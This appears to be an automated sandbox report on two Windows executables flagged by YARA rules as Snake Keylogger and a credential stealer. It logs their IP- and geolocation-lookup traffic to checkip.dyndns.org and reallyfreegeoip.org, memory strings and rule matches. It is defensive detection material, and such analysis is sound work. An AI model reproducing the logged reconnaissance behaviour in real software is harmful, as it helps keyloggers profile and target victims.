Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49737 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49744 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E8E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: VQsnGWaNi5.exe, 00000000.00000002.1725694272.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 00000009.00000002.1774693590.0000000003101000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: VQsnGWaNi5.exe, 00000000.00000002.1736124304.00000000070D2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002998000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: VQsnGWaNi5.exe, 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002998000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002E76000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A54000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A27000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A38000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A90000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.00000000029DB000.00000004.00000800.00020000.00000000.sdmp, VQsnGWaNi5.exe, 00000008.00000002.1866290229.0000000002A82000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002EB9000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F60000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F09000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F25000.00000004.00000800.00020000.00000000.sdmp, ywKvCTGbQjXP.exe, 0000000D.00000002.1884137452.0000000002F17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: VQsnGWaNi5.exe, ywKvCTGbQjXP.exe.0.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767

System Summary

Malicious sample detected (through community Yara rule)

Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 8.2.VQsnGWaNi5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.422f900.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.ywKvCTGbQjXP.exe.420f4e0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b6eda0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.VQsnGWaNi5.exe.3b4e980.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000008.00000002.1863654671.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000009.00000002.1777946348.000000000420F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1729092792.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VQsnGWaNi5.exe PID: 6532, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: VQsnGWaNi5.exe PID: 7284, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen
Source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: ywKvCTGbQjXP.exe PID: 7384, type: MEMORYSTR	Matched rule: Detects Snake Keylogger Author: ditekSHen

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_01103E34	0_2_01103E34
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_0110E124	0_2_0110E124
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_01106F90	0_2_01106F90
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_07093668	0_2_07093668
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Code function: 0_2_07091240	0_2_07091240
